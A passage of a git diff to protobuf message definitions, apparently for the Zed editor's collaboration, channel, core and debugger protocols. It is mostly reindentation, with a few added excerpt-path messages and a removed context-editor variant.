UpdateView update_view = 6; - } + uint64 room_id = 1; + optional uint64 project_id = 2; + reserved 3; + oneof variant { + View create_view = 5; + UpdateActiveView update_active_view = 4; + UpdateView update_view = 6; + } } message Unfollow { - uint64 room_id = 1; - optional uint64 project_id = 2; - PeerId leader_id = 3; + uint64 room_id = 1; + optional uint64 project_id = 2; + PeerId leader_id = 3; } message ViewId { - PeerId creator = 1; - uint64 id = 2; + PeerId creator = 1; + uint64 id = 2; } message UpdateActiveView { - 
reserved 1, 2; - View view = 3; + reserved 1, 2; + View view = 3; } enum PanelId { - AssistantPanel = 0; - DebugPanel = 1; + AssistantPanel = 0; + DebugPanel = 1; } message UpdateView { - ViewId id = 1; - optional PeerId leader_id = 2; - - oneof variant { - Editor editor = 3; - } - - message Editor { - repeated ExcerptInsertion inserted_excerpts = 1; - repeated uint64 deleted_excerpts = 2; - repeated Selection selections = 3; - optional Selection pending_selection = 4; - EditorAnchor scroll_top_anchor = 5; - reserved 6; - reserved 7; - double scroll_x = 8; - double scroll_y = 9; - } + ViewId id = 1; + optional PeerId leader_id = 2; + + oneof variant { + Editor editor = 3; + } + + message Editor { + repeated ExcerptInsertion inserted_excerpts = 1; + repeated uint64 deleted_excerpts = 2; + repeated Selection selections = 3; + optional Selection pending_selection = 4; + EditorAnchor scroll_top_anchor = 5; + reserved 6; + reserved 7; + double scroll_x = 8; + double scroll_y = 9; + repeated PathExcerpts updated_paths = 10; + repeated uint64 deleted_buffers = 11; + } } message View { - ViewId id = 1; - optional PeerId leader_id = 2; - optional PanelId panel_id = 6; - - oneof variant { - Editor editor = 3; - ChannelView channel_view = 4; - ContextEditor context_editor = 5; - } - - message Editor { - bool singleton = 1; - optional string title = 2; - repeated Excerpt excerpts = 3; - repeated Selection selections = 4; - optional Selection pending_selection = 5; - EditorAnchor scroll_top_anchor = 6; - reserved 7; - reserved 8; - double scroll_x = 9; - double scroll_y = 10; - } - - message ChannelView { - uint64 channel_id = 1; - Editor editor = 2; - } - - message ContextEditor { - string context_id = 1; - Editor editor = 2; - } + ViewId id = 1; + optional PeerId leader_id = 2; + optional PanelId panel_id = 6; + + oneof variant { + Editor editor = 3; + ChannelView channel_view = 4; + } + + reserved 5; + + message Editor { + bool singleton = 1; + optional string title = 2; + 
repeated Excerpt excerpts = 3; + repeated Selection selections = 4; + optional Selection pending_selection = 5; + EditorAnchor scroll_top_anchor = 6; + reserved 7; + reserved 8; + double scroll_x = 9; + double scroll_y = 10; + repeated PathExcerpts path_excerpts = 11; + } + + message ChannelView { + uint64 channel_id = 1; + Editor editor = 2; + } } message ExcerptInsertion { - Excerpt excerpt = 1; - optional uint64 previous_excerpt_id = 2; + Excerpt excerpt = 1; + optional uint64 previous_excerpt_id = 2; } message Excerpt { - uint64 id = 1; - uint64 buffer_id = 2; - Anchor context_start = 3; - Anchor context_end = 4; - Anchor primary_start = 5; - Anchor primary_end = 6; + uint64 id = 1; + uint64 buffer_id = 2; + Anchor context_start = 3; + Anchor context_end = 4; + Anchor primary_start = 5; + Anchor primary_end = 6; +} + +message ExcerptRange { + Anchor context_start = 1; + Anchor context_end = 2; + Anchor primary_start = 3; + Anchor primary_end = 4; +} + +message PathExcerpts { + PathKey path_key = 1; + uint64 buffer_id = 2; + repeated ExcerptRange ranges = 3; } message Contact { - uint64 user_id = 1; - bool online = 2; - bool busy = 3; + uint64 user_id = 1; + bool online = 2; + bool busy = 3; } message SetRoomParticipantRole { - uint64 room_id = 1; - uint64 user_id = 2; - ChannelRole role = 3; + uint64 room_id = 1; + uint64 user_id = 2; + ChannelRole role = 3; } diff --git a/crates/proto/proto/channel.proto b/crates/proto/proto/channel.proto index cada21cd5b7ede4730f2f4e71e98fb9a3dc12ff0..f1238b20a37815c9c6db999b8031a8eff2ba6cea 100644 --- a/crates/proto/proto/channel.proto +++ b/crates/proto/proto/channel.proto @@ -1,294 +1,294 @@ syntax = "proto3"; package zed.messages; -import "core.proto"; import "buffer.proto"; +import "core.proto"; message Channel { - uint64 id = 1; - string name = 2; - ChannelVisibility visibility = 3; - int32 channel_order = 4; - repeated uint64 parent_path = 5; + uint64 id = 1; + string name = 2; + ChannelVisibility visibility = 3; + 
int32 channel_order = 4; + repeated uint64 parent_path = 5; } enum ChannelVisibility { - Public = 0; - Members = 1; + Public = 0; + Members = 1; } message UpdateChannels { - repeated Channel channels = 1; - repeated uint64 delete_channels = 4; - repeated Channel channel_invitations = 5; - repeated uint64 remove_channel_invitations = 6; - repeated ChannelParticipants channel_participants = 7; - repeated ChannelBufferVersion latest_channel_buffer_versions = 9; + repeated Channel channels = 1; + repeated uint64 delete_channels = 4; + repeated Channel channel_invitations = 5; + repeated uint64 remove_channel_invitations = 6; + repeated ChannelParticipants channel_participants = 7; + repeated ChannelBufferVersion latest_channel_buffer_versions = 9; - reserved 8; - reserved 10 to 15; + reserved 8; + reserved 10 to 15; } message UpdateUserChannels { - repeated ChannelBufferVersion observed_channel_buffer_version = 2; - repeated ChannelMembership channel_memberships = 3; + repeated ChannelBufferVersion observed_channel_buffer_version = 2; + repeated ChannelMembership channel_memberships = 3; - reserved 1; + reserved 1; } message ChannelMembership { - uint64 channel_id = 1; - ChannelRole role = 2; + uint64 channel_id = 1; + ChannelRole role = 2; } message ChannelMessageId { - uint64 channel_id = 1; - uint64 message_id = 2; + uint64 channel_id = 1; + uint64 message_id = 2; } message ChannelPermission { - uint64 channel_id = 1; - ChannelRole role = 3; + uint64 channel_id = 1; + ChannelRole role = 3; } message ChannelParticipants { - uint64 channel_id = 1; - repeated uint64 participant_user_ids = 2; + uint64 channel_id = 1; + repeated uint64 participant_user_ids = 2; } message JoinChannel { - uint64 channel_id = 1; + uint64 channel_id = 1; } message DeleteChannel { - uint64 channel_id = 1; + uint64 channel_id = 1; } message GetChannelMembers { - uint64 channel_id = 1; - string query = 2; - uint64 limit = 3; + uint64 channel_id = 1; + string query = 2; + uint64 limit = 3; } 
message GetChannelMembersResponse { - repeated ChannelMember members = 1; - repeated User users = 2; + repeated ChannelMember members = 1; + repeated User users = 2; } message ChannelMember { - uint64 user_id = 1; - Kind kind = 3; - ChannelRole role = 4; + uint64 user_id = 1; + Kind kind = 3; + ChannelRole role = 4; - enum Kind { - Member = 0; - Invitee = 1; - } + enum Kind { + Member = 0; + Invitee = 1; + } } message SubscribeToChannels {} message CreateChannel { - string name = 1; - optional uint64 parent_id = 2; + string name = 1; + optional uint64 parent_id = 2; } message CreateChannelResponse { - Channel channel = 1; - optional uint64 parent_id = 2; + Channel channel = 1; + optional uint64 parent_id = 2; } message InviteChannelMember { - uint64 channel_id = 1; - uint64 user_id = 2; - ChannelRole role = 4; + uint64 channel_id = 1; + uint64 user_id = 2; + ChannelRole role = 4; } message RemoveChannelMember { - uint64 channel_id = 1; - uint64 user_id = 2; + uint64 channel_id = 1; + uint64 user_id = 2; } enum ChannelRole { - Admin = 0; - Member = 1; - Guest = 2; - Banned = 3; - Talker = 4; + Admin = 0; + Member = 1; + Guest = 2; + Banned = 3; + Talker = 4; } message SetChannelMemberRole { - uint64 channel_id = 1; - uint64 user_id = 2; - ChannelRole role = 3; + uint64 channel_id = 1; + uint64 user_id = 2; + ChannelRole role = 3; } message SetChannelVisibility { - uint64 channel_id = 1; - ChannelVisibility visibility = 2; + uint64 channel_id = 1; + ChannelVisibility visibility = 2; } message RenameChannel { - uint64 channel_id = 1; - string name = 2; + uint64 channel_id = 1; + string name = 2; } message RenameChannelResponse { - Channel channel = 1; + Channel channel = 1; } message JoinChannelChat { - uint64 channel_id = 1; + uint64 channel_id = 1; } message JoinChannelChatResponse { - repeated ChannelMessage messages = 1; - bool done = 2; + repeated ChannelMessage messages = 1; + bool done = 2; } message LeaveChannelChat { - uint64 channel_id = 1; + uint64 
channel_id = 1; } message SendChannelMessage { - uint64 channel_id = 1; - string body = 2; - Nonce nonce = 3; - repeated ChatMention mentions = 4; - optional uint64 reply_to_message_id = 5; + uint64 channel_id = 1; + string body = 2; + Nonce nonce = 3; + repeated ChatMention mentions = 4; + optional uint64 reply_to_message_id = 5; } message RemoveChannelMessage { - uint64 channel_id = 1; - uint64 message_id = 2; + uint64 channel_id = 1; + uint64 message_id = 2; } message UpdateChannelMessage { - uint64 channel_id = 1; - uint64 message_id = 2; - Nonce nonce = 4; - string body = 5; - repeated ChatMention mentions = 6; + uint64 channel_id = 1; + uint64 message_id = 2; + Nonce nonce = 4; + string body = 5; + repeated ChatMention mentions = 6; } message AckChannelMessage { - uint64 channel_id = 1; - uint64 message_id = 2; + uint64 channel_id = 1; + uint64 message_id = 2; } message SendChannelMessageResponse { - ChannelMessage message = 1; + ChannelMessage message = 1; } message ChannelMessageSent { - uint64 channel_id = 1; - ChannelMessage message = 2; + uint64 channel_id = 1; + ChannelMessage message = 2; } message ChannelMessageUpdate { - uint64 channel_id = 1; - ChannelMessage message = 2; + uint64 channel_id = 1; + ChannelMessage message = 2; } message GetChannelMessages { - uint64 channel_id = 1; - uint64 before_message_id = 2; + uint64 channel_id = 1; + uint64 before_message_id = 2; } message GetChannelMessagesResponse { - repeated ChannelMessage messages = 1; - bool done = 2; + repeated ChannelMessage messages = 1; + bool done = 2; } message GetChannelMessagesById { - repeated uint64 message_ids = 1; + repeated uint64 message_ids = 1; } message MoveChannel { - uint64 channel_id = 1; - uint64 to = 2; + uint64 channel_id = 1; + uint64 to = 2; } message ReorderChannel { - uint64 channel_id = 1; - enum Direction { - Up = 0; - Down = 1; - } - Direction direction = 2; + uint64 channel_id = 1; + enum Direction { + Up = 0; + Down = 1; + } + Direction direction = 2; } 
message JoinChannelBuffer { - uint64 channel_id = 1; + uint64 channel_id = 1; } message ChannelBufferVersion { - uint64 channel_id = 1; - repeated VectorClockEntry version = 2; - uint64 epoch = 3; + uint64 channel_id = 1; + repeated VectorClockEntry version = 2; + uint64 epoch = 3; } message UpdateChannelBufferCollaborators { - uint64 channel_id = 1; - repeated Collaborator collaborators = 2; + uint64 channel_id = 1; + repeated Collaborator collaborators = 2; } message UpdateChannelBuffer { - uint64 channel_id = 1; - repeated Operation operations = 2; + uint64 channel_id = 1; + repeated Operation operations = 2; } message ChannelMessage { - uint64 id = 1; - string body = 2; - uint64 timestamp = 3; - uint64 sender_id = 4; - Nonce nonce = 5; - repeated ChatMention mentions = 6; - optional uint64 reply_to_message_id = 7; - optional uint64 edited_at = 8; + uint64 id = 1; + string body = 2; + uint64 timestamp = 3; + uint64 sender_id = 4; + Nonce nonce = 5; + repeated ChatMention mentions = 6; + optional uint64 reply_to_message_id = 7; + optional uint64 edited_at = 8; } message ChatMention { - Range range = 1; - uint64 user_id = 2; + Range range = 1; + uint64 user_id = 2; } message RejoinChannelBuffers { - repeated ChannelBufferVersion buffers = 1; + repeated ChannelBufferVersion buffers = 1; } message RejoinChannelBuffersResponse { - repeated RejoinedChannelBuffer buffers = 1; + repeated RejoinedChannelBuffer buffers = 1; } message AckBufferOperation { - uint64 buffer_id = 1; - uint64 epoch = 2; - repeated VectorClockEntry version = 3; + uint64 buffer_id = 1; + uint64 epoch = 2; + repeated VectorClockEntry version = 3; } message JoinChannelBufferResponse { - uint64 buffer_id = 1; - uint32 replica_id = 2; - string base_text = 3; - repeated Operation operations = 4; - repeated Collaborator collaborators = 5; - uint64 epoch = 6; + uint64 buffer_id = 1; + uint32 replica_id = 2; + string base_text = 3; + repeated Operation operations = 4; + repeated Collaborator 
collaborators = 5; + uint64 epoch = 6; } message RejoinedChannelBuffer { - uint64 channel_id = 1; - repeated VectorClockEntry version = 2; - repeated Operation operations = 3; - repeated Collaborator collaborators = 4; + uint64 channel_id = 1; + repeated VectorClockEntry version = 2; + repeated Operation operations = 3; + repeated Collaborator collaborators = 4; } message LeaveChannelBuffer { - uint64 channel_id = 1; + uint64 channel_id = 1; } message RespondToChannelInvite { - uint64 channel_id = 1; - bool accept = 2; + uint64 channel_id = 1; + bool accept = 2; } diff --git a/crates/proto/proto/core.proto b/crates/proto/proto/core.proto index 121ea749127d7af4bbc34da2a1edbad78b7763df..c721ab62a11620895f8d54e69b4eb0bf168e43d0 100644 --- a/crates/proto/proto/core.proto +++ b/crates/proto/proto/core.proto @@ -2,28 +2,28 @@ syntax = "proto3"; package zed.messages; message PeerId { - uint32 owner_id = 1; - uint32 id = 2; + uint32 owner_id = 1; + uint32 id = 2; } message User { - reserved 4; - uint64 id = 1; - string github_login = 2; - string avatar_url = 3; - optional string name = 5; + reserved 4; + uint64 id = 1; + string github_login = 2; + string avatar_url = 3; + optional string name = 5; } message Nonce { - uint64 upper_half = 1; - uint64 lower_half = 2; + uint64 upper_half = 1; + uint64 lower_half = 2; } message Collaborator { - PeerId peer_id = 1; - uint32 replica_id = 2; - uint64 user_id = 3; - bool is_host = 4; - optional string committer_name = 5; - optional string committer_email = 6; + PeerId peer_id = 1; + uint32 replica_id = 2; + uint64 user_id = 3; + bool is_host = 4; + optional string committer_name = 5; + optional string committer_email = 6; } diff --git a/crates/proto/proto/debugger.proto b/crates/proto/proto/debugger.proto index dcfb91c77dd0004bfb248d4e4c23dcf269b7bc11..bf29411f96a45a26265650727d1529e9351245d2 100644 --- a/crates/proto/proto/debugger.proto +++ b/crates/proto/proto/debugger.proto @@ -1,555 +1,553 @@ syntax = "proto3"; package 
zed.messages; -import "core.proto"; import "buffer.proto"; import "task.proto"; enum BreakpointState { - Enabled = 0; - Disabled = 1; + Enabled = 0; + Disabled = 1; } message Breakpoint { - Anchor position = 1; - BreakpointState state = 2; - reserved 3; - optional string message = 4; - optional string condition = 5; - optional string hit_condition = 6; - map session_state = 7; + Anchor position = 1; + BreakpointState state = 2; + reserved 3; + optional string message = 4; + optional string condition = 5; + optional string hit_condition = 6; + map session_state = 7; } message BreakpointSessionState { - uint64 id = 1; - bool verified = 2; + uint64 id = 1; + bool verified = 2; } message BreakpointsForFile { - uint64 project_id = 1; - string path = 2; - repeated Breakpoint breakpoints = 3; + uint64 project_id = 1; + string path = 2; + repeated Breakpoint breakpoints = 3; } message ToggleBreakpoint { - uint64 project_id = 1; - string path = 2; - Breakpoint breakpoint = 3; + uint64 project_id = 1; + string path = 2; + Breakpoint breakpoint = 3; } enum DapThreadStatus { - Running = 0; - Stopped = 1; - Exited = 2; - Ended = 3; + Running = 0; + Stopped = 1; + Exited = 2; + Ended = 3; } enum VariablesArgumentsFilter { - Indexed = 0; - Named = 1; + Indexed = 0; + Named = 1; } message ValueFormat { - optional bool hex = 1; + optional bool hex = 1; } message VariablesRequest { - uint64 project_id = 1; - uint64 client_id = 2; - uint64 variables_reference = 3; - optional VariablesArgumentsFilter filter = 4; - optional uint64 start = 5; - optional uint64 count = 6; - optional ValueFormat format = 7; + uint64 project_id = 1; + uint64 client_id = 2; + uint64 variables_reference = 3; + optional VariablesArgumentsFilter filter = 4; + optional uint64 start = 5; + optional uint64 count = 6; + optional ValueFormat format = 7; } enum SteppingGranularity { - Statement = 0; - Line = 1; - Instruction = 2; + Statement = 0; + Line = 1; + Instruction = 2; } message DapLocationsRequest { - 
uint64 project_id = 1; - uint64 session_id = 2; - uint64 location_reference = 3; + uint64 project_id = 1; + uint64 session_id = 2; + uint64 location_reference = 3; } message DapLocationsResponse { - DapSource source = 1; - uint64 line = 2; - optional uint64 column = 3; - optional uint64 end_line = 4; - optional uint64 end_column = 5; + DapSource source = 1; + uint64 line = 2; + optional uint64 column = 3; + optional uint64 end_line = 4; + optional uint64 end_column = 5; } enum DapEvaluateContext { - Repl = 0; - Watch = 1; - Hover = 2; - Clipboard = 3; - EvaluateVariables = 4; - EvaluateUnknown = 5; + Repl = 0; + Watch = 1; + Hover = 2; + Clipboard = 3; + EvaluateVariables = 4; + EvaluateUnknown = 5; } message DapEvaluateRequest { - uint64 project_id = 1; - uint64 client_id = 2; - string expression = 3; - optional uint64 frame_id = 4; - optional DapEvaluateContext context = 5; + uint64 project_id = 1; + uint64 client_id = 2; + string expression = 3; + optional uint64 frame_id = 4; + optional DapEvaluateContext context = 5; } message DapEvaluateResponse { - string result = 1; - optional string evaluate_type = 2; - uint64 variable_reference = 3; - optional uint64 named_variables = 4; - optional uint64 indexed_variables = 5; - optional string memory_reference = 6; + string result = 1; + optional string evaluate_type = 2; + uint64 variable_reference = 3; + optional uint64 named_variables = 4; + optional uint64 indexed_variables = 5; + optional string memory_reference = 6; } - message DapCompletionRequest { - uint64 project_id = 1; - uint64 client_id = 2; - string query = 3; - optional uint64 frame_id = 4; - optional uint64 line = 5; - uint64 column = 6; + uint64 project_id = 1; + uint64 client_id = 2; + string query = 3; + optional uint64 frame_id = 4; + optional uint64 line = 5; + uint64 column = 6; } enum DapCompletionItemType { - Method = 0; - Function = 1; - Constructor = 2; - Field = 3; - Variable = 4; - Class = 5; - Interface = 6; - Module = 7; - Property = 8; - 
Unit = 9; - Value = 10; - Enum = 11; - Keyword = 12; - Snippet = 13; - Text = 14; - Color = 15; - CompletionItemFile = 16; - Reference = 17; - Customcolor = 19; + Method = 0; + Function = 1; + Constructor = 2; + Field = 3; + Variable = 4; + Class = 5; + Interface = 6; + Module = 7; + Property = 8; + Unit = 9; + Value = 10; + Enum = 11; + Keyword = 12; + Snippet = 13; + Text = 14; + Color = 15; + CompletionItemFile = 16; + Reference = 17; + Customcolor = 19; } message DapCompletionItem { - string label = 1; - optional string text = 2; - optional string sort_text = 3; - optional string detail = 4; - optional DapCompletionItemType typ = 5; - optional uint64 start = 6; - optional uint64 length = 7; - optional uint64 selection_start = 8; - optional uint64 selection_length = 9; + string label = 1; + optional string text = 2; + optional string sort_text = 3; + optional string detail = 4; + optional DapCompletionItemType typ = 5; + optional uint64 start = 6; + optional uint64 length = 7; + optional uint64 selection_start = 8; + optional uint64 selection_length = 9; } message DapCompletionResponse { - uint64 client_id = 1; - repeated DapCompletionItem completions = 2; + uint64 client_id = 1; + repeated DapCompletionItem completions = 2; } message DapScopesRequest { - uint64 project_id = 1; - uint64 client_id = 2; - uint64 stack_frame_id = 3; + uint64 project_id = 1; + uint64 client_id = 2; + uint64 stack_frame_id = 3; } message DapScopesResponse { - repeated DapScope scopes = 1; + repeated DapScope scopes = 1; } message DapSetVariableValueRequest { - uint64 project_id = 1; - uint64 client_id = 2; - string name = 3; - string value = 4; - uint64 variables_reference = 5; + uint64 project_id = 1; + uint64 client_id = 2; + string name = 3; + string value = 4; + uint64 variables_reference = 5; } message DapSetVariableValueResponse { - uint64 client_id = 1; - string value = 2; - optional string variable_type = 3; - optional uint64 variables_reference = 4; - optional uint64 
named_variables = 5; - optional uint64 indexed_variables = 6; - optional string memory_reference = 7; + uint64 client_id = 1; + string value = 2; + optional string variable_type = 3; + optional uint64 variables_reference = 4; + optional uint64 named_variables = 5; + optional uint64 indexed_variables = 6; + optional string memory_reference = 7; } message DapPauseRequest { - uint64 project_id = 1; - uint64 client_id = 2; - int64 thread_id = 3; + uint64 project_id = 1; + uint64 client_id = 2; + int64 thread_id = 3; } message DapDisconnectRequest { - uint64 project_id = 1; - uint64 client_id = 2; - optional bool restart = 3; - optional bool terminate_debuggee = 4; - optional bool suspend_debuggee = 5; + uint64 project_id = 1; + uint64 client_id = 2; + optional bool restart = 3; + optional bool terminate_debuggee = 4; + optional bool suspend_debuggee = 5; } message DapTerminateThreadsRequest { - uint64 project_id = 1; - uint64 client_id = 2; - repeated int64 thread_ids = 3; + uint64 project_id = 1; + uint64 client_id = 2; + repeated int64 thread_ids = 3; } message DapThreadsRequest { - uint64 project_id = 1; - uint64 client_id = 2; + uint64 project_id = 1; + uint64 client_id = 2; } message DapThreadsResponse { - repeated DapThread threads = 1; + repeated DapThread threads = 1; } message DapTerminateRequest { - uint64 project_id = 1; - uint64 client_id = 2; - optional bool restart = 3; + uint64 project_id = 1; + uint64 client_id = 2; + optional bool restart = 3; } message DapRestartRequest { - uint64 project_id = 1; - uint64 client_id = 2; - bytes raw_args = 3; + uint64 project_id = 1; + uint64 client_id = 2; + bytes raw_args = 3; } message DapRestartStackFrameRequest { - uint64 project_id = 1; - uint64 client_id = 2; - uint64 stack_frame_id = 3; + uint64 project_id = 1; + uint64 client_id = 2; + uint64 stack_frame_id = 3; } message ToggleIgnoreBreakpoints { - uint64 project_id = 1; - uint32 session_id = 2; + uint64 project_id = 1; + uint32 session_id = 2; } message 
IgnoreBreakpointState { - uint64 project_id = 1; - uint64 session_id = 2; - bool ignore = 3; + uint64 project_id = 1; + uint64 session_id = 2; + bool ignore = 3; } message DapNextRequest { - uint64 project_id = 1; - uint64 client_id = 2; - int64 thread_id = 3; - optional bool single_thread = 4; - optional SteppingGranularity granularity = 5; + uint64 project_id = 1; + uint64 client_id = 2; + int64 thread_id = 3; + optional bool single_thread = 4; + optional SteppingGranularity granularity = 5; } message DapStepInRequest { - uint64 project_id = 1; - uint64 client_id = 2; - int64 thread_id = 3; - optional uint64 target_id = 4; - optional bool single_thread = 5; - optional SteppingGranularity granularity = 6; + uint64 project_id = 1; + uint64 client_id = 2; + int64 thread_id = 3; + optional uint64 target_id = 4; + optional bool single_thread = 5; + optional SteppingGranularity granularity = 6; } message DapStepOutRequest { - uint64 project_id = 1; - uint64 client_id = 2; - int64 thread_id = 3; - optional bool single_thread = 4; - optional SteppingGranularity granularity = 5; + uint64 project_id = 1; + uint64 client_id = 2; + int64 thread_id = 3; + optional bool single_thread = 4; + optional SteppingGranularity granularity = 5; } message DapStepBackRequest { - uint64 project_id = 1; - uint64 client_id = 2; - int64 thread_id = 3; - optional bool single_thread = 4; - optional SteppingGranularity granularity = 5; + uint64 project_id = 1; + uint64 client_id = 2; + int64 thread_id = 3; + optional bool single_thread = 4; + optional SteppingGranularity granularity = 5; } message DapContinueRequest { - uint64 project_id = 1; - uint64 client_id = 2; - int64 thread_id = 3; - optional bool single_thread = 4; + uint64 project_id = 1; + uint64 client_id = 2; + int64 thread_id = 3; + optional bool single_thread = 4; } message DapContinueResponse { - uint64 client_id = 1; - optional bool all_threads_continued = 2; + uint64 client_id = 1; + optional bool all_threads_continued = 2; } 
message DapModulesRequest { - uint64 project_id = 1; - uint64 client_id = 2; + uint64 project_id = 1; + uint64 client_id = 2; } message DapModulesResponse { - uint64 client_id = 1; - repeated DapModule modules = 2; + uint64 client_id = 1; + repeated DapModule modules = 2; } message DapLoadedSourcesRequest { - uint64 project_id = 1; - uint64 client_id = 2; + uint64 project_id = 1; + uint64 client_id = 2; } message DapLoadedSourcesResponse { - uint64 client_id = 1; - repeated DapSource sources = 2; + uint64 client_id = 1; + repeated DapSource sources = 2; } message DapStackTraceRequest { - uint64 project_id = 1; - uint64 client_id = 2; - int64 thread_id = 3; - optional uint64 start_frame = 4; - optional uint64 stack_trace_levels = 5; + uint64 project_id = 1; + uint64 client_id = 2; + int64 thread_id = 3; + optional uint64 start_frame = 4; + optional uint64 stack_trace_levels = 5; } message DapStackTraceResponse { - repeated DapStackFrame frames = 1; + repeated DapStackFrame frames = 1; } message DapStackFrame { - uint64 id = 1; - string name = 2; - optional DapSource source = 3; - uint64 line = 4; - uint64 column = 5; - optional uint64 end_line = 6; - optional uint64 end_column = 7; - optional bool can_restart = 8; - optional string instruction_pointer_reference = 9; - optional DapModuleId module_id = 10; - optional DapStackPresentationHint presentation_hint = 11; + uint64 id = 1; + string name = 2; + optional DapSource source = 3; + uint64 line = 4; + uint64 column = 5; + optional uint64 end_line = 6; + optional uint64 end_column = 7; + optional bool can_restart = 8; + optional string instruction_pointer_reference = 9; + optional DapModuleId module_id = 10; + optional DapStackPresentationHint presentation_hint = 11; } message DebuggerLoadedSourceList { - uint64 client_id = 1; - repeated DapSource sources = 2; + uint64 client_id = 1; + repeated DapSource sources = 2; } message DapVariables { - uint64 client_id = 1; - repeated DapVariable variables = 2; + uint64 
client_id = 1; + repeated DapVariable variables = 2; } // Remote Debugging: Dap Types message DapVariable { - string name = 1; - string value = 2; - optional string type = 3; - // optional DapVariablePresentationHint presentation_hint = 4; - optional string evaluate_name = 5; - uint64 variables_reference = 6; - optional uint64 named_variables = 7; - optional uint64 indexed_variables = 8; - optional string memory_reference = 9; + string name = 1; + string value = 2; + optional string type = 3; + // optional DapVariablePresentationHint presentation_hint = 4; + optional string evaluate_name = 5; + uint64 variables_reference = 6; + optional uint64 named_variables = 7; + optional uint64 indexed_variables = 8; + optional string memory_reference = 9; } message DapThread { - int64 id = 1; - string name = 2; + int64 id = 1; + string name = 2; } message DapScope { - string name = 1; - optional DapScopePresentationHint presentation_hint = 2; - uint64 variables_reference = 3; - optional uint64 named_variables = 4; - optional uint64 indexed_variables = 5; - bool expensive = 6; - optional DapSource source = 7; - optional uint64 line = 8; - optional uint64 column = 9; - optional uint64 end_line = 10; - optional uint64 end_column = 11; + string name = 1; + optional DapScopePresentationHint presentation_hint = 2; + uint64 variables_reference = 3; + optional uint64 named_variables = 4; + optional uint64 indexed_variables = 5; + bool expensive = 6; + optional DapSource source = 7; + optional uint64 line = 8; + optional uint64 column = 9; + optional uint64 end_line = 10; + optional uint64 end_column = 11; } message DapSource { - optional string name = 1; - optional string path = 2; - optional uint64 source_reference = 3; - optional DapSourcePresentationHint presentation_hint = 4; - optional string origin = 5; - repeated DapSource sources = 6; - optional bytes adapter_data = 7; - repeated DapChecksum checksums = 8; + optional string name = 1; + optional string path = 2; + optional 
uint64 source_reference = 3; + optional DapSourcePresentationHint presentation_hint = 4; + optional string origin = 5; + repeated DapSource sources = 6; + optional bytes adapter_data = 7; + repeated DapChecksum checksums = 8; } enum DapOutputCategory { - ConsoleOutput = 0; - Important = 1; - Stdout = 2; - Stderr = 3; - Unknown = 4; + ConsoleOutput = 0; + Important = 1; + Stdout = 2; + Stderr = 3; + Unknown = 4; } enum DapOutputEventGroup { - Start = 0; - StartCollapsed = 1; - End = 2; + Start = 0; + StartCollapsed = 1; + End = 2; } message DapOutputEvent { - string output = 1; - optional DapOutputCategory category = 2; - optional uint64 variables_reference = 3; - optional DapOutputEventGroup group = 4; - optional DapSource source = 5; - optional uint32 line = 6; - optional uint32 column = 7; + string output = 1; + optional DapOutputCategory category = 2; + optional uint64 variables_reference = 3; + optional DapOutputEventGroup group = 4; + optional DapSource source = 5; + optional uint32 line = 6; + optional uint32 column = 7; } enum DapChecksumAlgorithm { - CHECKSUM_ALGORITHM_UNSPECIFIED = 0; - MD5 = 1; - SHA1 = 2; - SHA256 = 3; - TIMESTAMP = 4; + CHECKSUM_ALGORITHM_UNSPECIFIED = 0; + MD5 = 1; + SHA1 = 2; + SHA256 = 3; + TIMESTAMP = 4; } message DapChecksum { - DapChecksumAlgorithm algorithm = 1; - string checksum = 2; + DapChecksumAlgorithm algorithm = 1; + string checksum = 2; } enum DapScopePresentationHint { - Arguments = 0; - Locals = 1; - Registers = 2; - ReturnValue = 3; - ScopeUnknown = 4; + Arguments = 0; + Locals = 1; + Registers = 2; + ReturnValue = 3; + ScopeUnknown = 4; } enum DapSourcePresentationHint { - SourceNormal = 0; - Emphasize = 1; - Deemphasize = 2; - SourceUnknown = 3; + SourceNormal = 0; + Emphasize = 1; + Deemphasize = 2; + SourceUnknown = 3; } enum DapStackPresentationHint { - StackNormal = 0; - Label = 1; - Subtle = 2; - StackUnknown = 3; + StackNormal = 0; + Label = 1; + Subtle = 2; + StackUnknown = 3; } message DapModule { - 
DapModuleId id = 1; - string name = 2; - optional string path = 3; - optional bool is_optimized = 4; - optional bool is_user_code = 5; - optional string version = 6; - optional string symbol_status = 7; - optional string symbol_file_path = 8; - optional string date_time_stamp = 9; - optional string address_range = 10; + DapModuleId id = 1; + string name = 2; + optional string path = 3; + optional bool is_optimized = 4; + optional bool is_user_code = 5; + optional string version = 6; + optional string symbol_status = 7; + optional string symbol_file_path = 8; + optional string date_time_stamp = 9; + optional string address_range = 10; } message DebugTaskDefinition { - string adapter = 1; - string label = 2; - string config = 3; - optional TcpHost tcp_connection = 4; + string adapter = 1; + string label = 2; + string config = 3; + optional TcpHost tcp_connection = 4; } message TcpHost { - optional uint32 port = 1; - optional string host = 2; - optional uint64 timeout = 3; + optional uint32 port = 1; + optional string host = 2; + optional uint64 timeout = 3; } message DebugLaunchRequest { - string program = 1; - optional string cwd = 2; - repeated string args = 3; - map env = 4; + string program = 1; + optional string cwd = 2; + repeated string args = 3; + map env = 4; } message DebugAttachRequest { - uint32 process_id = 1; + uint32 process_id = 1; } message DapModuleId { - oneof id { - uint32 number = 1; - string string = 2; - } + oneof id { + uint32 number = 1; + string string = 2; + } } message GetDebugAdapterBinary { - uint64 project_id = 1; - uint64 session_id = 3; - DebugTaskDefinition definition = 2; - uint64 worktree_id = 4; + uint64 project_id = 1; + uint64 session_id = 3; + DebugTaskDefinition definition = 2; + uint64 worktree_id = 4; } message DebugAdapterBinary { - optional string command = 1; - repeated string arguments = 2; - map envs = 3; - optional string cwd = 4; - optional TcpHost connection = 5; - string configuration = 7; - LaunchType launch_type = 
8; - enum LaunchType { - Attach = 0; - Launch = 1; - } + optional string command = 1; + repeated string arguments = 2; + map envs = 3; + optional string cwd = 4; + optional TcpHost connection = 5; + string configuration = 7; + LaunchType launch_type = 8; + enum LaunchType { + Attach = 0; + Launch = 1; + } } message RunDebugLocators { - uint64 project_id = 1; - SpawnInTerminal build_command = 2; - string locator = 3; + uint64 project_id = 1; + SpawnInTerminal build_command = 2; + string locator = 3; } message DebugRequest { - oneof request { - DebugLaunchRequest debug_launch_request = 1; - DebugAttachRequest debug_attach_request = 2; - } + oneof request { + DebugLaunchRequest debug_launch_request = 1; + DebugAttachRequest debug_attach_request = 2; + } } message DebugScenario { - string label = 1; - string adapter = 2; - reserved 3; - DebugRequest request = 4; - optional TcpHost connection = 5; - optional bool stop_on_entry = 6; - optional string configuration = 7; + string label = 1; + string adapter = 2; + reserved 3; + DebugRequest request = 4; + optional TcpHost connection = 5; + optional bool stop_on_entry = 6; + optional string 